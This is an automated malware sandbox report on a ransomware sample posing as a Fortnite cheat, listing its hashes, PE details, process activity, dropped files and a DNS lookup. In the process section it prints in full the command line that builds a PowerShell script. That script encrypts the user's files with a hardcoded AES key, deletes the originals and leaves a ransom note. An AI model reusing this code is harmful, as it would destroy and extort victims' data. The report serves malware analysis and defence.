analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

SydneyFortniteHacks.bin

Full analysis: https://app.any.run/tasks/0978da95-2ba9-4edd-a0cb-59be35d4c381
Verdict: Malicious activity
Analysis date: October 14, 2019, 12:31:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5:

DA6B7DDD28DC387BCD10B180C9BDFF58

SHA1:

C29CD8C4370576AFB63DEEA020BCAFD8C0638DE0

SHA256:

077EEE74B8F1227707B389A953234756D3BF8B78108A24F132BD5FEB209DD8F6

SSDEEP:

98304:79Xv0eg9Xv0WJEdbxAtwOT3vjONrdbxAtQGTgvjOmh9Xvp79XvTY9XvRy9Xvjo9V:tqiRJAUkotsOFdRvCkn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • UAC/LUA settings modification

      • SydneyFortniteHacks.bin.exe (PID: 3332)
    • Application was dropped or rewritten from another process

      • LimeUSB_Csharp.exe (PID: 3388)
      • LimeUSB_Csharp.exe (PID: 3288)
      • startSF.exe (PID: 2660)
      • cgo46ea565sdfse7.exe (PID: 1936)
      • LimeUSB_Csharp.exe (PID: 3084)
      • LimeUSB_Csharp.exe (PID: 2968)
      • LimeUSB_Csharp.exe (PID: 2848)
      • LimeUSB_Csharp.exe (PID: 2480)
      • LimeUSB_Csharp.exe (PID: 1212)
      • LimeUSB_Csharp.exe (PID: 2968)
      • LimeUSB_Csharp.exe (PID: 1916)
      • LimeUSB_Csharp.exe (PID: 956)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3796)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1704)
      • cmd.exe (PID: 3796)
      • startSF.exe (PID: 2660)
      • cgo46ea565sdfse7.exe (PID: 1936)
    • Executable content was dropped or overwritten

      • SydneyFortniteHacks.bin.exe (PID: 3332)
    • Creates files in the user directory

      • powershell.exe (PID: 2472)
    • Executed via COM

      • DllHost.exe (PID: 3960)
    • Changes the desktop background image

      • SydneyFortniteHacks.bin.exe (PID: 3332)
  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 1976)
      • WINWORD.EXE (PID: 788)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1976)
      • WINWORD.EXE (PID: 788)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1976)
      • WINWORD.EXE (PID: 788)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (63.1)
.exe | Win64 Executable (generic) (23.8)
.dll | Win32 Dynamic Link Library (generic) (5.6)
.exe | Win32 Executable (generic) (3.8)
.exe | Generic Win/DOS Executable (1.7)

EXIF

EXE

AssemblyVersion: 16.0.5.0
ProductVersion: 16.0.5.0
ProductName: Fortnite Hacks
OriginalFileName: SyrkProject.exe
LegalTrademarks: -
LegalCopyright: Copyright © 2019
InternalName: SyrkProject.exe
FileVersion: 16.0.5.0
FileDescription: Fortnite Hacks
CompanyName: -
Comments: Hack of Fortnite, with Aimbot and ESP
CharacterSet: Unicode
LanguageCode: Neutral
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x003f
ProductVersionNumber: 16.0.5.0
FileVersionNumber: 16.0.5.0
Subsystem: Windows GUI
SubsystemVersion: 6
ImageVersion: -
OSVersion: 4
EntryPoint: 0xc22186
UninitializedDataSize: -
InitializedDataSize: 134144
CodeSize: 12714496
LinkerVersion: 80
PEType: PE32
TimeStamp: 2038:05:23 20:39:36+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 17-Apr-1902 12:11:20
Debug artifacts:
  • C:\Users\Pixel\source\repos\SyrkProject\SyrkProject\obj\Debug\SyrkProject.pdb
Comments: Hack of Fortnite, with Aimbot and ESP
CompanyName: -
FileDescription: Fortnite Hacks
FileVersion: 16.0.5.0
InternalName: SyrkProject.exe
LegalCopyright: Copyright © 2019
LegalTrademarks: -
OriginalFilename: SyrkProject.exe
ProductName: Fortnite Hacks
ProductVersion: 16.0.5.0
Assembly Version: 16.0.5.0

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 17-Apr-1902 12:11:20
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LARGE_ADDRESS_AWARE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00002000
0x00C2018C
0x00C20200
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.75298
.rsrc
0x00C24000
0x00020A00
0x00020A00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.66267
.reloc
0x00C46000
0x0000000C
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
0.10191

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.9887
3480
UNKNOWN
UNKNOWN
RT_MANIFEST
2
4.30592
67624
UNKNOWN
UNKNOWN
RT_ICON
3
4.52372
16936
UNKNOWN
UNKNOWN
RT_ICON
4
4.67239
9640
UNKNOWN
UNKNOWN
RT_ICON
5
4.81467
4264
UNKNOWN
UNKNOWN
RT_ICON
6
5.07318
1128
UNKNOWN
UNKNOWN
RT_ICON
32512
2.79908
90
UNKNOWN
UNKNOWN
RT_GROUP_ICON

Imports

mscoree.dll
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
64
Monitored processes
23
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start start sydneyfortnitehacks.bin.exe no specs sydneyfortnitehacks.bin.exe cgo46ea565sdfse7.exe no specs startsf.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs limeusb_csharp.exe no specs limeusb_csharp.exe no specs limeusb_csharp.exe no specs limeusb_csharp.exe no specs limeusb_csharp.exe no specs winword.exe no specs limeusb_csharp.exe no specs PhotoViewer.dll no specs limeusb_csharp.exe no specs limeusb_csharp.exe no specs limeusb_csharp.exe no specs winword.exe no specs limeusb_csharp.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3424"C:\Users\admin\AppData\Local\Temp\SydneyFortniteHacks.bin.exe" C:\Users\admin\AppData\Local\Temp\SydneyFortniteHacks.bin.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Fortnite Hacks
Exit code:
3221226540
Version:
16.0.5.0
3332"C:\Users\admin\AppData\Local\Temp\SydneyFortniteHacks.bin.exe" C:\Users\admin\AppData\Local\Temp\SydneyFortniteHacks.bin.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Description:
Fortnite Hacks
Version:
16.0.5.0
1936"C:\Users\Public\Documents\cgo46ea565sdfse7.exe" C:\Users\Public\Documents\cgo46ea565sdfse7.exeSydneyFortniteHacks.bin.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
2660"C:\Users\Public\Documents\startSF.exe" C:\Users\Public\Documents\startSF.exeSydneyFortniteHacks.bin.exe
User:
admin
Integrity Level:
HIGH
Exit code:
1
1704C:\Windows\system32\cmd.exe /c cmd.exe /c mkdir %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo function New-CryptographyKey() { > Cipher.psm1 & echo [CmdletBinding()] >> Cipher.psm1 & echo [OutputType([System.Security.SecureString])] >> Cipher.psm1 & echo [OutputType([String], ParameterSetName='PlainText')] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$false, Position=1)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm='AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [Int]$KeySize, >> Cipher.psm1 & echo [Parameter(ParameterSetName='PlainText')] >> Cipher.psm1 & echo [Switch]$AsPlainText) >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo try { >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('KeySize')){ >> Cipher.psm1 & echo $Crypto.KeySize = $KeySize } >> Cipher.psm1 & echo $Crypto.GenerateKey() >> Cipher.psm1 & echo if($AsPlainText) { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) } >> Cipher.psm1 & echo else { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) ^| ConvertTo-SecureString -AsPlainText -Force } } >> Cipher.psm1 & echo catch { Write-Error $_ } } } >> Cipher.psm1 & echo Function Protect-File { >> Cipher.psm1 & echo [CmdletBinding(DefaultParameterSetName='SecureString')] >> Cipher.psm1 & echo [OutputType([System.IO.FileInfo[]])] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$true, Position=1, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] >> Cipher.psm1 & echo [Alias('PSPath','LiteralPath')] >> Cipher.psm1 & echo [string[]]$FileName, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm = 'AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=3, ParameterSetName='SecureString')] >> Cipher.psm1 & echo [System.Security.SecureString]$Key = (New-CryptographyKey -Algorithm $Algorithm), >> Cipher.psm1 & echo [Parameter(Mandatory=$true, Position=3, ParameterSetName='PlainText')] >> Cipher.psm1 & echo [String]$KeyAsPlainText, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=4)] >> Cipher.psm1 & echo [System.Security.Cryptography.CipherMode]$CipherMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=5)] >> Cipher.psm1 & echo [System.Security.Cryptography.PaddingMode]$PaddingMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=6)] >> Cipher.psm1 & echo [String]$Suffix = ".$Algorithm", >> Cipher.psm1 & echo [Parameter()] >> Cipher.psm1 & echo [Switch]$RemoveSource) >> Cipher.psm1 & echo Begin { try { >> Cipher.psm1 & echo if($PSCmdlet.ParameterSetName -eq 'PlainText') { >> Cipher.psm1 & echo $Key = $KeyAsPlainText ^| ConvertTo-SecureString -AsPlainText -Force} >> Cipher.psm1 & echo $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Key) >> Cipher.psm1 & echo $EncryptionKey = [System.Convert]::FromBase64String([System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)) >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('CipherMode')){ >> Cipher.psm1 & echo $Crypto.Mode = $CipherMode } >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('PaddingMode')){ >> Cipher.psm1 & echo $Crypto.Padding = $PaddingMode } >> Cipher.psm1 & echo $Crypto.KeySize = $EncryptionKey.Length*8 >> Cipher.psm1 & echo $Crypto.Key = $EncryptionKey } >> Cipher.psm1 & echo Catch { Write-Error $_ -ErrorAction Stop } } >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo $Files = Get-Item -LiteralPath $FileName >> Cipher.psm1 & echo ForEach($File in $Files) { $DestinationFile = $File.FullName + $Suffix >> Cipher.psm1 & echo Try { >> Cipher.psm1 & echo $FileStreamReader = New-Object System.IO.FileStream($File.FullName, [System.IO.FileMode]::Open) >> Cipher.psm1 & echo $FileStreamWriter = New-Object System.IO.FileStream($DestinationFile, [System.IO.FileMode]::Create) >> Cipher.psm1 & echo $Crypto.GenerateIV() >> Cipher.psm1 & echo $FileStreamWriter.Write([System.BitConverter]::GetBytes($Crypto.IV.Length), 0, 4) >> Cipher.psm1 & echo $FileStreamWriter.Write($Crypto.IV, 0, $Crypto.IV.Length) >> Cipher.psm1 & echo $Transform = $Crypto.CreateEncryptor() >> Cipher.psm1 & echo $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write) >> Cipher.psm1 & echo $FileStreamReader.CopyTo($CryptoStream) >> Cipher.psm1 & echo $CryptoStream.FlushFinalBlock() >> Cipher.psm1 & echo $CryptoStream.Close() >> Cipher.psm1 & echo $FileStreamReader.Close() >> Cipher.psm1 & echo $FileStreamWriter.Close() >> Cipher.psm1 & echo if($RemoveSource){Remove-Item -LiteralPath $File.FullName} >> Cipher.psm1 & echo $result = Get-Item $DestinationFile >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name SourceFile -Value $File.FullName >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Algorithm -Value $Algorithm >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Key -Value $Key >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name CipherMode -Value $Crypto.Mode >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name PaddingMode -Value $Crypto.Padding >> Cipher.psm1 & echo $result } >> Cipher.psm1 & echo Catch { Write-Error $_ >> Cipher.psm1 & echo If($FileStreamWriter) >> Cipher.psm1 & echo { $FileStreamWriter.Close() >> Cipher.psm1 & echo Remove-Item -LiteralPath $DestinationFile -Force } >> Cipher.psm1 & echo Continue >> Cipher.psm1 & echo } Finally { if($CryptoStream){$CryptoStream.Close()} >> Cipher.psm1 & echo if($FileStreamReader){$FileStreamReader.Close()} >> Cipher.psm1 & echo if($FileStreamWriter){$FileStreamWriter.Close()} } } } } >> Cipher.psm1 & echo Import-Module Cipher > cry.ps1 & echo $files = get-childitem $home -recurse -Include *.gif, *.sln, *.docx, *.php, *.psd, *.ico, *.mov, *.xlsx, *.jpg, *.xls, *.doc, *.pdf, *.wav, *.pptx, *.ppt, *.txt, *.png, *.bmp, *.rar, *.zip, *.mp3, *.mp4, *.avi ^| where {^! $_.PSIsContainer} >> cry.ps1 & echo foreach ($file in $files) { Protect-File $file -Algorithm AES -KeyAsPlainText NDZlODRmYzNlYTJhMDFlMTUwZDE3YzdiMmQzN2JhN2Q= -Suffix '.Syrk' -RemoveSource } >> cry.ps1 & echo echo 'Your personal files have been encrypted by Syrk Malware, send an email to [email protected] to recover them.' ^> $home\Desktop\Readme_now.txt >> cry.ps1 & echo start $home\Desktop\Readme_now.txt >> cry.ps1 & exitC:\Windows\system32\cmd.execgo46ea565sdfse7.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
292cmd.exe /c mkdir C:\Users\admin\Documents\WindowsPowerShell\Modules\Cipher C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
964"C:\Windows\system32\cmd" /c "C:\Users\admin\AppData\Local\Temp\C4E1.tmp\C4E2.tmp\C4E3.bat C:\Users\Public\Documents\startSF.exe"C:\Windows\system32\cmd.exestartSF.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3796C:\Windows\system32\cmd.exe /c cmd.exe /c cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo Remove-Item -path $home\Documents\WindowsPowerShell\Modules\Cipher\* >> %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & exitC:\Windows\system32\cmd.execgo46ea565sdfse7.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3620cmd.exe /c cd C:\Users\admin\Documents\WindowsPowerShell\Modules\Cipher C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2472powershell -ExecutionPolicy ByPass -File C:\Users\admin\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 953
Read events
2 002
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
2
Text files
72
Unknown types
7

Dropped files

PID
Process
Filename
Type
2660startSF.exeC:\Users\admin\AppData\Local\Temp\C4E1.tmp\C4E2.tmp\C4E3.bat
MD5:
SHA256:
1704cmd.exeC:\Users\admin\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psm1text
MD5:3D12427E874B39D71842B55AC7A7A800
SHA256:05CBCD057E2B47DDAF0B74DDF01B86EBD9B9ECBAA5CC66F8F9FDF02CD22E017D
2472powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZH9D4ZFKTCTVZFDQISFD.temp
MD5:
SHA256:
1976WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8AF0.tmp.cvr
MD5:
SHA256:
1976WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{76772A45-2BA5-41AF-A8BF-441E12864612}.tmp
MD5:
SHA256:
1976WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{46EB2593-E358-469E-92C1-A009809F26F5}.tmp
MD5:
SHA256:
3332SydneyFortniteHacks.bin.exeC:\Users\Public\Documents\cgo46ea565sdfse7.exeexecutable
MD5:C1BD6D763E6EB6213CAC300B03DB380B
SHA256:C239D501439B776E93085925EB132FF164B1F3BA4FDC356A00045E8674DC1387
1976WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6607C15F-1AF8-42FB-B06B-6D87AAE5F764}.tmp
MD5:
SHA256:
788WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2B18.tmp.cvr
MD5:
SHA256:
3332SydneyFortniteHacks.bin.exeC:\Users\Public\Documents\startSF.exeexecutable
MD5:6CC73421112F42575153BF7CFE7DB572
SHA256:31C3E1C03B15347BF8184854E65261A81BA12DB0DCF3AEB5344CED6D8321DDF1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
gr9wgs94fg5sb3y8l.000webhostapp.com
  • 145.14.145.38
shared

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
No debug info